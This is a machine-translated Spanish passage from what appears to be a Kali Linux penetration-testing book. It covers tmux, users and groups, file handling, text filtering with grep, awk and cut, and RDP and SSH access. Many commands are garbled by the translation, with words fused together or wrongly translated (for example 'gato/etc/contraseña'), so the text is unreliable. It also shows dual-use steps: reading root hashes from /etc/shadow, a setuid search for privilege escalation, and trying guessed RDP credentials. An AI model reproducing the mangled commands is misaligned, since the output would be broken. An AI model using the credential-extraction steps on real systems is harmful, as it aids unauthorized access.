teclado y presione la tecla de coma (,) en su teclado. (renombrar-ventana)Ventana1 Creación de ventana En esta etapa, solo tenemos una ventana, vamos a crear una segunda presionando Ctrl+Band y luego presionando la tecla C. Mirando la parte inferior, verá que tiene una nueva ventana bash, y Tmux ya ha resaltado la pestaña actual con un asterisco (*), como se muestra en la Figura 1.2. Figura 1.2 Nueva pestaña resaltada de Tmux Canal de Telegram : @IRFaraExam Machine Translated by Google DividirVentanas Para dividir la pestaña seleccionada en dos subventanas una al lado de la otra, como se muestra en la Figura 1.3, debe presionar Ctrl+Bandluegoingresarelcarácter%ensuteclado(recuerdequedebepresionarMayús+%o,de lo contrario, se considerará 5 en su teclado). Figura 1.3 TmuxVerticalWindowsSidebySide NavegaciónInteriorTmux Asombroso, ¿verdad? Como puede ver, el cursor se encuentra en el panel derecho (vea la Figura 1.3). Para alternar entre paneles (subventanas), presione Ctrl+B y use las teclas de flecha en su teclado (para cambiar a la izquierda, derecha, arriba y abajo). A continuación, regrese a la sesión de la Ventana 1. Para alternar entre ventanas, presione Ctrl+B y luego el número de la ventana (que es 0 según este ejemplo), y deberíamos volver a la primera ventana. Ahora, divida la ventana en dos secciones, una sobre la otra, como se muestra en la Figura 1.4. Para hacer esto, use Ctrl+Band, luego las comillas dobles ("). Recuerde que debe presionar Mayús+“o, de lo contrario, esa tecla produce una comilla simple. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.4 TmuxHorizontalWindows El consejo final para administrar Tmux es para desplazarse hacia arriba y hacia abajo dentro de una ventana o una sesión de panel. De hecho, no puede usar el mouse para desplazarse hacia arriba y hacia abajo en una sesión de Tmux (el desplazamiento del mouse es para el historial de comandos). Para cerrar una ventana nueva, simplemente use exit como con cualquier sesión normal de ventana de terminal. TmuxCommandsReference La Tabla 1.1 resume todos los comandos Tmux que aprendió en esta sección. Puede usar una referencia (esta es solo una guía rápida para que pueda comenzar a usar Tmux; si desea ir más allá de lo básico, consulte la referencia manual). Table1.1 Atajos de teclado Tmux DESCRIPCIÓN MANDO Ventana Torenamea Ctrl+B+, Canal de Telegram : @IRFaraExam Machine Translated by Google Paraabrirunanuevaventana Ctrl+B+C Para dividir ventanas verticalmente Ctrl+B+% Para dividir la ventana horizontalmente Ctrl+B+" Para navegar por las subventanas Ctrl+B+Flecha izquierda,Ctrl+B+Flecha derecha Para cambiar entre ventanas Ctrl+B+[número de ventana] Desplazarse hacia arriba Ctrl+B+[+flecha arriba Desplazarse hacia abajo Ctrl+B+[+flecha abajo Para escapar del modo de desplazamiento Esc Paracerrarpanel/ventana Escriba salir (dentro de él) Administración de usuarios y grupos en Kali Comprenderloscomandosparaadministrarusuariosygruposesimportante porque utilizará la información cuando se entere de la escalada de privilegios más adelante en el libro. Todos los comandos en este capítulo le ayudarán mucho en su compromisos mientras usa KaliLinux (como un sistema operativo para sus pruebas de penetración). La figura 1.5 resume todos los comandos relacionados con la administración/seguridad de los usuarios en KaliLinux. UsuariosComandos Los usuarios con privilegios bajos deben anteponer los comandos con sudo para ejecutar el sistema comandos (y el usuario con privilegios bajos debe estar en el grupo sudo para ejecutar sudo ). Se le pedirá la contraseña de su cuenta si desea utilizar el sudo comando. Por ejemplo, si desea ejecutar la herramienta del sistema fdisk para mostrar los dispositivos conectados a Kali, use el siguiente comando: raíz @ kali: ~ # fdisk-l Disco/dev/sda:80GiB,85899345920bytes,167772160sectores Modelo de disco:VMwareVirtualS Unidades: sectores de 1512* = 512 bytes Tamaño del sector (lógico/físico): 512 bytes/512 bytes I/Osize (mínimo/óptimo): 512 bytes/512 bytes Tipo de etiqueta de disco:dos Identificador de disco: 0x7c02676c Dispositivo Arranque/dev/sda1* StartEndSectorsSizeIdType 204816577126316576921679G83Linux Canal de Telegram : @IRFaraExam Machine Translated by Google Machine Translated by Google Figura 1.5 KaliLinuxOSSecurityCommands Para agregar un nuevo usuario a Kali (en este ejemplo, Gu va a ser el usuario), use el comando useradd . Junto con él, debe elegir el grupo sudo con la opción ÿG y el tipo de shell con la opción ÿs : $useradd-m[nombre de usuario]-G[nombre de grupo]-s[tipo de shell] Para nuestro ejemplo, se ve así: root@kali:~#useradd-mGus-Gsudo-s/bin/bash A continuación, proporcionemos al nuevo usuario una contraseña mediante el comando passwd : $contraseña[nombre de usuario-quequierescambiarlacontraseña] Aquí se muestra cómo se ve en la ventana de la terminal: root@kali:~#passwdGus Nueva contraseña: Vuelva a escribir nueva contraseña: contraseña: contraseña actualizada con éxito Si observa detenidamente la parte superior izquierda, está escrito root@kali ; sé que esto es confuso, pero la estructura de esta parte tiene el siguiente formato: nombredeusuario@nombredehost Para cambiar al nuevo usuario Gus que creamos anteriormente, usamos el comando your (preste atención a cómo el usuario ha cambiado en el texto de la ventana terminal y se convirtió en Gus @ kali ): $su[nombre de usuario–al que desea cambiar] raíz@kali:~#suGus Gus@kali:/raíz$ Para conocer las capacidades del usuario actual con el comando sudo , debe ejecutar sudo ÿ l para obtener la información correcta: Gus@kali:~$sudo-l Confiamos en que haya recibido la lección habitual del administrador del sistema local. Por lo general, se reduce a estas tres cosas: Canal de Telegram : @IRFaraExam Machine Translated by Google #1)Respetarlaprivacidaddelosdemás. #2) Piense antes de escribir. #3) Un gran poder conlleva una gran responsabilidad. [sudo]contraseña de Gus: Coincidencia de entradas predeterminadas para Gusonkali: env_reset,mail_badpass, ruta_segura=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin El usuario Gus puede ejecutar los siguientes comandos en kali: (TODOS:TODOS)TODOS Para ver la información del usuario actual, use el comando id : Gus@kali:~$id uid = 1001 (Gus) gid = 1001 (Gus) grupos = 1001 (Gus), 27 (sudo) Para enumerar los usuarios conectados actualmente, use w o who (con menos detalles): Gus@kali:~$w 10:44:06up19min,1usuario,promedio de carga:0.00,0.00,0.00 TTY roottty7/usr/lib/x USUARIO Gus@kali:~$quien roottty7 PCU PCPUQUÉ INICIAR SESIÓN@IDLE10:2419:552.36s2.36s DESDE :0 2020-09-2210:24(:0) Para eliminar un usuario (el usuario que eliminaremos en este ejemplo es test ), ejecute el comando userdel : $usuariodel[nombredeusuario–quequiereseliminar] Gus@kali:~$suduserdeltest Para enumerar los últimos usuarios registrados en el sistema Kali, configure el último comando: Gus@kali: ~ $ último roottty7loggedin :0 marsep2210:24todavía reiniciando systemboot5.7.0-kali1-amd6TueSep2210:24todavía raíz tty8 :1 marsep2210: 21-10: 23 (00:02) Canal de Telegram : @IRFaraExam Machine Translated by Google veces pts/1 tmux(1793).%0 lunsep2112: 16-10: 23 (22:07) veces pts/2 tmux(1584).%0 lunsep2111: 48-11: 48 tty7 :0 lunsep2110:50-10:23 (00:00) tiempos (23:33) reiniciar systemboot5.7.0-kali1-amd6MonSep2110:50-10:23 (23:33) tty7 :0 LunJul2713:36-15:56 tiempos (02:20) reiniciar systemboot5.7.0-kali1-amd6MonJul2713:36-15:57 (02:20) veces tty7 (00:05) reiniciar systemboot5.7.0-kali1-amd6MonJul2713:30-15:57 (02:26) veces tty7 (00:02) reiniciar systemboot5.7.0-kali1-amd6MonJul2713:28-15:57 :0 lunjul2713:31-accidente :0 MonJul2713: 28-choque (02:28) wtmpbeginsMonJul2713:28:092020 Por último, tenga en cuenta que todos los usuarios de Kalia se restauran en un archivo de configuración, /etc/contraseña . Use el comando cat para revelar su contenido: Gus@kali:~$gato/etc/contraseña raíz:x:0:0:raíz:/raíz:/bin/bash demonio:x:1:1:demonio:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin El comando anterior enumerará todos los usuarios, incluso los del sistema (el ejemplo solo muestra los primeros tres). Para filtrar el contenido y limitar los resultados para el usuarioshumanos,canalizarlasalidautilizando | comando grep : Gus@kali: ~ $ gato/etc/contraseña | grep "/bin/bash" raíz:x:0:0:raíz:/raíz:/bin/bash postgres:x:119:124:administrador de PostgreSQL,,,:/var/lib/postgresql:/bin/bash tiempos:x:1000:1000:tiempos,,,:/inicio/tiempos:/bin/bash Gus:x:1001:1001::/home/Gus:/bin/bash GruposComandos Para agregar un nuevo grupo en KaliLinux, use el comando groupadd : Canal de Telegram : @IRFaraExam Machine Translated by Google $groupadd[nombre del nuevo grupo] Gus@kali:~$sudogroupaddhackers Para unir un usuario (que es Gus para este ejemplo) al grupo de hackers que creamos anteriormente, ejecute el comando usermod : $usermod-aG[nombre de grupo][nombre de usuario] Gus@kali:~$sudousermod-aGhackersGus Para obtener una lista de todos los grupos creados en Kali Linux, abra el archivo /etc/group . Nuevamente, use el comando cat para hacer el trabajo (el siguiente ejemplo muestra solo los tres primeros): Gus@kali:~$cat/etc/group root:x:0: daemon:x:1: bin:x:2: […] hackers:x:1002:Gus Administración de contraseñas en Kali Probablemente desee recuperar su usuario raíz como en los viejos tiempos. Para recuperar esta cuenta, primero deberá establecer su contraseña. Para cambiar una contraseña de usuario, debe usar el comando passwd : Gus@kali:~$sudopasswdroot Nueva contraseña: Vuelva a escribir nueva contraseña: contraseña: contraseña actualizada con éxito Ahora, para usar la poderosa cuenta raíz, debe usar el comando su para cambiar de usuario: Gus@kali:~$sudosuroot root@kali:/ home/Gus# A partir de ahora, en la pantalla de inicio de sesión, puede elegir su cuenta raíz en lugar de su usuario no raíz. Finalmente, para enumerar todas las credenciales de usuario en KaliLinux, puede revelarlas en el archivo /etc/shadow . Use el comando grep para obtener las credenciales de usuario para Gus: root@kali:/#cat/etc/shadow|grep"Gus" Canal de Telegram : @IRFaraExam Machine Translated by Google Gus: $ 6 $ Hb.QBfIoaCBTiqK $ EUJ4ZdWmbsFqHMsPbMEz2df6FtWVf4J/tMulxCoLQmfMlVWyqpMUHBG Simplifiquemos lo que tienes que hacer para pararte desde la cuerda. En segundo lugar, $6$ significa que la contraseña se ha borrado mediante SHA-512. Por último, la contraseña hash comienza después de $6$ y justo antes del delimitador:: Hb.QBfIoaCBTiqK$EUJ4ZdWmbsFqHMsPbMEz2df6FtWVf4J/tMulxCoLQmfMlVWyqpMUHBGmHFulRk Gestión de archivos y carpetas en Kali Linux Su próximo desafío en el sistema operativo Linux es aprender a administrar archivos y carpetas. Al final de esta sección, comenzará a usar los archivos y directorios en Kali como los profesionales. Mostrar archivos y carpetas Para enumerar los archivos y las subcarpetas dentro de cualquier directorio, use el comando ls para hacer el trabajo (yo uso ital para obtener una salida más simple ). root@kali:~#ls EscritorioDocumentosDescargasMúsicaImágenesPúblicoPlantillasVídeos root@kali:~#ls-la total144 drwx------14rootroot4096Sep2210:24. drwxr-xr-x19rootroot36864Jul2715:41.. -rw------- 1rootroot155Sep2210:23.bash_history -rw-r--r-1rootroot570Jul1817:08.bashrc drwx------ 6rootroot4096Sep2211:21.cache drwxr-xr-x 8rootroot4096Sep2210:22.config drwxr-xr-x 2rootroot4096Sep2210:21Escritorio -rw-r--r-- 1rootroot55Sep2210:21.dmrc drwxr-xr-x 2rootroot4096Sep2210:21Documentos drwxr-xr-x 2rootroot4096Sep2210:21Descargas -rw-r16root2-7-ul1-7 .face lrwxrwxrwx 1rootroot11Jul2713:22.face.icon->/root/.face Canal de Telegram : @IRFaraExam Machine Translated by Google drwx------ 3rootroot4096Sep2210:24.gnupg -rw------1rootroot306Sep2210:24.ICEauthority drwxr-xr-x 3rootroot4096Sep2210:21.local drwxr-xr-x 2rootroot4096Sep2210:21Música drwxr-xr-x 2Seproot4209 :21Imágenes -rw-r--r-- 1rootroot148Jul1817:08.profile drwxr-xr-x 2rootroot4096Sep2210:21Público drwxr-xr-x 2rootroot4096Sep2210:21Plantillas drwxr-xr-x 2rootroot4096Sep2210:21Video1s -rw98 :24.Xauthority -rw------- 1rootroot5961Sep2210:24.xsession-errors -rw------- 1rootroot6590Sep2210:23.xsession-errors.old root@kali:~# Tenga en cuenta que los nombres de archivos que comienzan con un carácter antes de sus nombres significan que están ocultos (por ejemplo, .bash_history ). Además, en el extremo izquierdo antes de los permisos, la letra d significa que es un directorio y no un archivo. $ls-la[destinationdirectorypath] permisos Para los permisos, el mismo principio se aplica a un archivo o directorio. Para simplificarlo, los permisos se dividen en tres categorías: Leer ( r ): 4 Escribir ( w ): 2 Ejecutar( x ):1 La plantilla de permisos aplica el siguiente patrón: [Usuario:r/w/x][grupo:r/w/x][todos:r/w/x] Canal de Telegram : @IRFaraExam Machine Translated by Google Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.6 KaliLinux : comandos de archivos y carpetas Veamos un ejemplo práctico. Digamos que creó un script de shell simple que imprime "prueba" ( usando el comando echo ) y que quería mostrar sus permisos (tenga en cuenta que este ejemplo usa el usuario raíz dentro de la ventana de la terminal): root @ kali: # echo'echotest '> test.sh root kali: # ls-la | grep'test.sh' -rw-r - r - 1rootroot10Sep2211: 25test.sh root kali: # De los resultados de salida anteriores, puede ver lo siguiente: Para el usuario raíz, puede leer y escribir debido a rw al principio. Para el grupo raíz, solo pueden leer este archivo. Para todos los demás en el sistema, solo pueden leer bien. Digamos que desea ejecutar este archivo, ya que usted es quien lo creó y es el maestro raíz. ¿Cree que podrá hacerlo (de acuerdo con los permisos anteriores para el usuario raíz)? root@kali:~#./test.sh bash:./ test.sh:Permiso denegado PROPINA El punto en el ejemplo anterior significa el directorio actual. De hecho, la raíz no tiene permiso para ejecutarlo, ¿verdad? Para cambiar los permisos del archivo anterior según la fórmula ( r = 4, w = 2 y x = 1), use esto: Usuario:4+2+1=7; Grupo: 4+2+1=7; Todos: 4 Luego, use el comando chmod para hacer el trabajo (esta vez, debería poder ejecutar el script de Shell): $chmod[números de permisos][nombre de archivo] raíz @ kali: # chmod774test.sh raíz kali: # lsla | grep'test.sh ' Canal de Telegram : @IRFaraExam Machine Translated by Google -rwxrwxr--1rootroot10Sep2211:25test.sh root@kali:~#./test.sh prueba root@kali:~# Hay otro atajo para esto, que permite la ejecución de un archivo en lugar de calcular los números de cada uno. Solo necesitamos agregar +x al comando chmod (pero tenga cuidado porque cuando ejecute este, también le estará dando el permiso de ejecución a todos): $chmod+x[nombre de archivo] root @ kali: ~ # chmod + xtest.sh root @ kali: l # ls-la | grep'test.sh '-rwxrwxr-x1rootroot10Sep2211: 25test.sh manipulación de archivos en Kali Para crear simplemente un archivo vacío en Linux, puede usar el comando táctil : $tocar[nuevoarchivo] Para insertar texto rápidamente en un archivo, puede usar el comando echo . Más adelante en este capítulo, aprenderá a editar archivos de texto con un editor de texto: $echo'texttoadd'>[nombre de archivo] Para conocer un tipo de archivo en un sistema Linux, debe usar el comando de archivo : $archivo[nombre de archivo] Reúnamos todos los comandos en la ventana de la terminal: root@kali:~#touchtest.txt root@kali:~#echotest>test.txt root@kali:~#filetest.txt test.txt:ASCIItext Para copiar un archivo en Kali, debe usar el comando cp para hacer el trabajo: $cp[ruta del archivo de origen][ruta del archivo de destino] root@kali:~#cptest.txt/home/kali root@kali:~#ls/home/kali prueba.sh DesktopDownloadsMusicPublicDocumentsls_file.txtPicturesTemplatestest.txt Canal de Telegram : @IRFaraExam Vídeos Machine Translated by Google Para mover un archivo que sea equivalente a cortar en el sistema operativo Windows, debe usar el comando mv : $mv[ruta del archivo de origen][ruta del archivo de destino] root@kali:~#mvtest.txtDocumentos/ root@kali:~#lsDocumentos/ prueba.txt Para eliminar el archivo que acabamos de copiar antes en el directorio principal de Kali , use el comando rm : $rm[rutadelarchivo–quequiereseliminar] root@kali:~#rm/home/ kali/test.txt Para cambiar el nombre del archivo anterior, usamos el mismo comando mv que usamos para mover un archivo: $mv[nombre de archivo original][nuevo nombre de archivo] root@kali:~/Documents#mvtest.txthello.txt root@kali:~/Documents#ls hello.txt BuscandoArchivos Hay varias formas de buscar archivos en Kali; las tres más comunes son los comandos de localización y qué . , encontrar , Puede utilizar el comando de localización para localizar un archivo que esté buscando rápidamente. Debe saber que el comando de localización almacena sus datos en una base de datos, de modo que cuando busque, encontrará los resultados más rápido. Primero, necesitará actualizar la base de datos para el comando de localización mediante el comando updatedb : $actualizadob Ahora, puede comenzar a buscar usando el comando de localización: $locate[nombre de archivo] root@kali:/#locatetest.sh /home/kali/ test.sh /usr/share/doc/socat/examples/ readline-test.sh /usr/share/doc/socat/examples/test .sh Puede usar el interruptor ÿn para el comando de localización para filtrar el número de Canal de Telegram : @IRFaraExam Machine Translated by Google resultados de salida. Esta opción es práctica si usted sabe que los resultados serán enorme: $locate-n[i][searchfilecriteria] root@kali:/#locate*.confn3 /etc/adduser.conf /etc/ca-certificates.conf /etc/ debconf.conf PROPINA Use el comando grep para obtener resultados más granulares. Para encontrar una ruta de aplicación, use el comando which . Este comando usará la variable de entorno $ PATH para encontrar los resultados que está buscando. Como ejemplo, para encontrar dónde está instalado Python, puede hacer lo siguiente: $que[nombre de la aplicación] root@kali:/#quepython/usr/bin/python Es importante comprender que un sistema Linux usará $PATH para ejecutar binarios. Si su unidad está en la ventana de terminal, mostrará todos los directorios donde debe guardar sus programas/scripts (si desea ejecutarlos sin especificar su ruta): root@kali:/#$PATH bash:/ usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: El fichero o directorio no existe Veamosunejemplopráctico; guardé el archivo test.sh en mi directorio de inicio. Dado que la carpeta de inicio no está en la variable $PATH , esto significa que puedo ejecutarla solo si especifico la ruta o, de lo contrario, fallará: root@kali:~#test.sh bash:test.sh:commandnotfound root@kali:~#./ test.sh prueba Otro comando útil para encontrar archivos con opciones más flexibles es el comando de búsqueda. La ventaja de usar la herramienta de búsqueda es que permite agregar filtros más granulares para encontrar lo que está buscando. Por ejemplo, para encontrar el archivo 1.txt Canal de Telegram : @IRFaraExam Machine Translated by Google bajo el directorio de inicio raíz, use esto: root@kali:~#buscar/nombre-raíz"archivo1.txt" /root/temp/ archivo1.txt Supongamos que desea enumerar los archivos grandes (1 GB o más) en su sistema: root@kali:~#buscar/-tamaño+1G2>/dev/null/proc/kcore PROPINA Agregar 2>/dev/null a su comando limpiará los resultados de salida y filtrará los errores. El siguiente es un filtro de búsqueda conveniente que busca archivos setuid en Linux para la escalada de privilegios (aprenderá todos los detalles en el Capítulo 10 , “Linux PrivilegeEscalation”): $buscar/-perm-u=s-typef2>/dev/null Compresión de archivos Existen múltiples formas (algoritmos de compresión) para comprimir archivos; las que trataré en esta sección son las extensiones .tar y .zip . , .gz , , .bz2 Aquí está la lista de comandos para comprimir y extraer diferentes tipos de archivos: TarArchivo Para comprimir usando tar extensión: $tarcfcompressed.tarfiles Para extraer un archivo comprimido: $ tarxfcomprimido.tar Archivo Gz Para crear comprimidos.tar.gz a partir de archivos: $ tarcfzcompressed.tar.gzfiles Canal de Telegram : @IRFaraExam Machine Translated by Google Para extraer comprimido.tar.gz: $ tarxfzcomprimido.tar.gz Para crear un archivo comprimido.txt.gz: $gzipfile.txt>comprimido.txt.gz Para extraer comprimido.txt.gz: $gzip-dcomprimido.txt.gz Extraigamos el archivo rockyou.txt.gz que viene inicialmente comprimido en Kali: root@kali:~#gzip-d/usr/share/wordlists/rockyou.txt.gz Archivo Bz2 Para crear comprimidos.tar.bz2 a partir de archivos: $ tarcfjcompressed.tar.bz2files Para extraer comprimido.tar.bz2: $ tarxfjcomprimido.tar.bz2 Archivo Zip Paracrearcomprimido.zipdesdearchivos: $zipcompressed.zipfiles Para extraer archivos comprimidos.zip: $descomprimircomprimido.zip Manipulación de directorios en Kali Para imprimir el directorio de trabajo actual, debe usar el comando pwd para hacer el trabajo (no mezcle el comando pwd con el comando passwd ; son dos cosas diferentes): $ por persona Para cambiar el directorio de trabajo actual, debe usar el comando cd : $cd[nuevarutadirectorio] Canal de Telegram : @IRFaraExam Machine Translated by Google Puede usar .. para recorrer un directorio hacia arriba. De hecho, puede agregar todo lo que desee hasta llegar a la carpeta raíz del sistema, / : root@kali:~/Documentos#pwd /root/ Documentos root@kali:~/ Documentos#cd../../ root@kali:/#pwd / Como sugerencia final, para el comando cd , puede usar el carácter ~ para ir directamente al directorio de inicio de su usuario actual: $cd~ Para crear un directorio llamado prueba en la carpeta de inicio raíz, use el comando mkdir : $mkdir[nombre del nuevo directorio] Para copiar, mover y renombrar un directorio, use el mismo comando para los comandos de archivo. A veces debe agregar el interruptor ÿr (que significa recursivo) para involucrar también a los subdirectorios: $cp-r[rutadirectorioorigen][rutadirectoriodestino] $mv-r[rutadirectorioorigen] [rutadirectoriodestino] $mv-r[nombredirectoriooriginal][nombrenuevodirectorio] Para eliminar una carpeta, debe agregar el modificador ÿr al comando rm para realizar el trabajo: $rm-r[carpetaaborrarruta] Montaje de un directorio Veamos un ejemplo práctico de cómo montar un directorio dentro de KaliLinux. Supongamos que insertó una llave USB; luego, es necesario montar un directorio para acceder al contenido de su unidad USB. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.7 Montaje USB Para montar una unidad USB, siga estos pasos: 1. Muestre la lista de discos mediante el comando lsblk . 2. Cree un nuevo directorio para montar (aquí es donde accederá al memoria USB). 3. Monte la unidad USB con el comando de montaje . Figura 1.8 Montaje con la línea de comandos Ahora, para expulsar la unidad USB, use el comando umount para desmontar el directorio: root@kali-portátil-hp:~#umount/mnt/usb Canal de Telegram : @IRFaraExam Machine Translated by Google Gestión de archivos de texto en KaliLinux Saber cómo manejar archivos en Kali Linux es algo que encontrará a menudo durante sus compromisos. En esta sección, aprenderá acerca de los comandos más comunes que puede usar para hacer el trabajo. Hay muchas maneras de mostrar un archivo de texto rápidamente en la ventana del terminal. El 90 por ciento del tiempo, uso el comando cat para este propósito . : , cola , root@kali:/usr/share/wordlists#catrockyou.txt|grepgus123 gus123 angus123 gus12345 […] El comando head mostrará 10 líneas en un archivo de texto comenzando desde la parte superior, y puede especificar cuántas líneas desea mostrar agregando la opción ÿn : $head-n[i][nombre de archivo] root@kali:/usr/share/wordlists#head-n7rockyou.txt 123456 12345 123456789 contraseña te amo princesa 1234567 El comando tail mostrará las últimas 10 líneas de un archivo, y también puede especificar el número de líneas usando el modificador ÿn : $tail-n[i][nombre de archivo] root@kali:/usr/share/wordlists#tail-n5rockyou.txt xCvBnM, es decir, 168 abygurl69 a6_123 * 7! Canal de Telegram : @IRFaraExam Machine Translated by Google Para examinar un archivo grande, use el comando más . Debe presionar Intro o la barra espaciadora del teclado para avanzar. Al presionar la tecla B, podrá retroceder. Finalmente, para buscar texto, presione / (barra hacia adelante) y la tecla Q para salir: $más[nombre de archivo] less es como el comando more ; le permite ver el contenido de un archivo y navegar dentro también. $menos[nombre de archivo] Para ordenar un archivo de texto, simplemente use el comando ordenar : $ordenar[nombre de archivo]>[nombre de archivo ordenado] root@kali:~/temp#catfile1.txt5 6 4 root@kali:~/temp#sortfile1.txt>file1_sorted.txt root@kali:~/temp#catfile1_sorted.txt4 5 6 Para eliminar duplicados en un archivo de texto, debe usar el comando uniq : $uniq[nombre de archivo]>[sin nombre de archivo duplicado] root@kali:~/temp#catfile2.txt 5 64 4 5 5 5 root@kali:~/temp#uniqfile2.txt>file2_uniq.txt root@kali:~/ temp#catfile2_uniq.txt 5 64 Canal de Telegram : @IRFaraExam Machine Translated by Google 5 Más adelante en este libro, aprenderá a usar los comandos sort y uniq juntos para crear un archivo de diccionario de contraseñas personalizado. Vimvs.Nano Para la ventana terminal, tenemos dos editores de texto populares, viman y nano. La mayoría de las veces, puede realizar cuatro tareas en los editores de texto: Abrir/crear el archivo de texto Hacer cambios de texto buscartexto Guardar y Salir Nano es más fácil que vim. Tú eliges cualquiera de ellos, es una cuestión de preferencia. Para abrir/crear un archivo de texto, use estos comandos: $vim[ nombre del archivo de texto ] $nano[ nombre del archivo de texto ] Una vez que se abre el archivo de texto, deberá comenzar a realizar sus cambios: Innano, puede ingresar su texto libremente. Invim, debe presionar I en su teclado para ingresar al modo de inserción. Si desea buscar una palabra específica dentro de su archivo, use estos comandos: Innano, presione Ctrl + W. Invim, depende del modo en el que estés. Si está en modo insertar texto, presione la tecla Esc y luego presione / seguido de la palabra que desea buscar. Si está en modo normal, simplemente presione / seguido de la palabra que desea buscar. Finalmente, es hora de guardar y salir de su editor de texto: Innano, presione Ctrl+O para guardar, presione la tecla Intro para ejecutar la tarea de guardar y luego presione Ctrl+X para salir. Canal de Telegram : @IRFaraExam Machine Translated by Google Invim, asegúrese de estar en modo normal primero (si no lo está, presione la tecla Esc La w es para volver al modo normal) y luego use :wq . para “escribir” y la q es para salir. Búsqueda y filtrado de texto Una cosa más que aprender en el mundo de los archivos de texto es el mecanismo de búsqueda. Hay muchas formas de buscar y filtrar texto, pero las más populares son las siguientes: sujeción awk Corte Me han visto usando mucho el comando grep . Este comando de filtro se desestructura de la siguiente manera: $grep[opciones][patrón][nombre de archivo] Supongamos que desea buscar la palabra contraseña en todos los archivos a partir del sistema raíz ( / ). root @ kali: / # grep-irl "contraseña" / /boot/grub/ i386-pc/zfscrypt.mod /boot/grub/i386-pc/normal.mod /boot/ grub/i386-pc/legacycfg.mod Esto es lo que significan las opciones: ÿi :Para ignorare incluir todas las mayúsculas/minúsculas ÿr :Para buscar de forma recursiva dentro de las subcarpetas ÿl :Para imprimir los nombres de archivo donde el filtro coincide Como otro ejemplo, supongamos que desea contar el número de ocurrencias de la palabra contraseña en el archivo de diccionario rockyou.txt : root@kali:/#cd/usr/share/wordlists/ root@kali:/usr/ share/wordlists#grep-c"contraseña"rockyou.txt 3959 El comando awk es una herramienta avanzada para filtrar archivos de texto y utiliza el siguiente patrón: Canal de Telegram : @IRFaraExam Machine Translated by Google $awk/[criterios de búsqueda]/[opciones][nombre de archivo] Por ejemplo, supongamos que desea buscar la raíz de texto dentro del archivo /etc/ passwd : root@kali:/#awk'/root/'/etc/passwd root:x:0:0:root:/ root:/bin/bash nm-openvpn:x:125:130:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin Llevemos el desafío un paso más allá. Digamos que desea extraer la contraseña de la raíz en el archivo /etc/shadow (puede imprimir todo primero para que pueda visualizar la diferencia del antes y el después): root@kali:/#awk'/root/'/etc/shadow root:$6$uf2Jy/ R8HS5Tx$Vw1wHuBV7unq1hImYGTJdNrRwMwRtf0yd/aSH0zOhhdzWofAT5WUSduQ root@kali:/#awk-F':''/root/{print$2}'/etc/shadow $6$uf2Jy/ R8HS5Tx$Vw1wHuBV7unq1hImYGTJdNrRwMwRtf0yd/aSH0zOhhdzWofAT5WUSduQTjWj8 Sabemos que el archivo shadow está usando el delimitador : para separar las secciones, por lo que usamos ÿF ':' para hacer el trabajo. Otra forma popular de extraer subcadenas es el comando cut . root@kali:/#cat/etc/shadow|grep"root"|cut-d":"-f2 $6$uf2Jy/ R8HS5Tx$Vw1wHuBV7unq1hImYGTJdNrRwMwRtf0yd/aSH0zOhhdzWofAT5WUSduQTjWj8 ConexionesRemotasenKali Hay dos formas comunes de conectarse de forma remota a otros sistemas operativos. Para Windows, es el Protocolo de escritorio remoto (RDP), y para Linux, es Secure Shell (SSH). Protocolo de escritorio remoto RDP se utiliza para conectarse de forma remota a un sistema operativo Windows. Supongamos que durante Canal de Telegram : @IRFaraExam Machine Translated by Google la participación que encontró es un puerto de escritorio remoto 3389 abierto en un host de Windows (p. ej., durante la fase de exploración de puertos). Luego, deberá intentar conectarse con algunas credenciales básicas (p. ej., un nombre de usuario de administrador y una contraseña de contraseña 123) . $rdesktop[direcciónIPdelhostdeWindows]-u[nombredeusuarioenventanas]p[contraseñaenventanas] También puede omitir la contraseña e ingresarla más tarde. Vea el ejemplo en la Figura 1.9. Figura 1.9 “Inicio de sesión de Windows” Cubierta segura El protocolo SSH es una conexión segura que le permite ejecutar comandos de forma remota en un host Linux (en este caso, Kali). De forma predeterminada, SSH es un protocolo TCP que funciona en el puerto 22 de forma predeterminada. Canal de Telegram : @IRFaraExam Machine Translated by Google servidor SSH remoto: Uso de credenciales de nombre de usuario/contraseña Uso de claves públicas/privadas (sin contraseña) SSHconCredenciales Comencemos primero con el método que usa la contraseña. De forma predeterminada, todas las cuentas de usuario, excepto la cuenta raíz, pueden iniciar sesión de forma remota en SSH: $ sshusuario @ kaliIP La figura 1.10 muestra un usuario raíz que no tiene permiso para iniciar sesión en Kali Linux de forma remota, así como un usuario normal ( kali ) que puede iniciar sesión de forma remota mediante SSH. Figura 1.10 SSH con Moba Xtermon Windows Para permitir que el usuario raíz inicie sesión de forma remota en SSH, deberá editar el archivo de configuración de SSH en este directorio: /etc/ssh/sshd_config Asegúrese de agregar la siguiente línea al archivo de configuración de SSH: Canal de Telegram : @IRFaraExam Machine Translated by Google Permitir inicio de sesión raíz Sí Ahora, podemos intentar conectarnos a nuestro host Kali de forma remota utilizando la cuenta raíz (debería funcionar esta vez después de los últimos cambios): Figura 1.11 SSHRootConnection Antes de comenzar a usar el servicio SSH en su Kali Linux, primero deberá iniciar el servicio SSH. Para hacer esto, deberá ejecutar el siguiente comando: $serviciosshstart Si desea detenerlo más tarde, use el siguiente comando: $serviciosshstop Si desea que el servidor SSH persista (se inicie automáticamente) incluso después de reiniciar el sistema, deberá ejecutar el siguiente comando: $systemctlenablessh Si olvidó el estado (iniciado o detenido) de su servidor SSH, ejecute el siguiente comando para obtener los resultados que se muestran en la Figura 1.12: $serviciosshstatus Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.12 SSHServiceStatus De manera predeterminada, el número de puerto de SSHis es 22, y si el servidor remoto de Linux ha cambiado a otro puerto, deberá especificarlo en su comando de conexión: $sshusername@kaliIP-p[número de puerto] Sin contraseñaSSH Usando una clave pública y una clave privada, un usuario remoto puede iniciar sesión usando SSH. Este método es más seguro que la contraseña porque nadie podrá usar la técnica de fuerza bruta para ingresar a su servidor de forma remota. Existe una gran cantidad de conceptos erróneos cuando se trata del mecanismo de claves públicas/privadas. Aquí está la información de la máquina cliente: SO:UbuntuDesktopLinuxV20 IP: 10.0.0.186 Aquí está la información del host Kali Linux SSH Server: Sistema 